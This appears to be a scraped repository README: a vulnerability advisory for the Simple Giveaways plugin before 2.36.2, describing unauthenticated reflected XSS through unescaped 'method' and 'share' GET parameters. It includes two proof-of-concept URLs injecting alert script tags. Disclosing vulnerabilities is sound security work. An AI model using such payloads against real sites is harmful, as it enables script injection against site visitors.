🤬
..
README.md Loading last commit info...
README.md

Simple Giveaways < 2.36.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS

Proof of Concept

https://example.com/giveaway/mygiveaways/?share=%3Cscript%3Ealert(document.domain)%3C/script%3E

https://example.com/giveaway/mygiveaways/?method=%3Cscript%3Ealert(/XSS/)%3C/script%3E 
Please wait...
Page is in error, reload to recover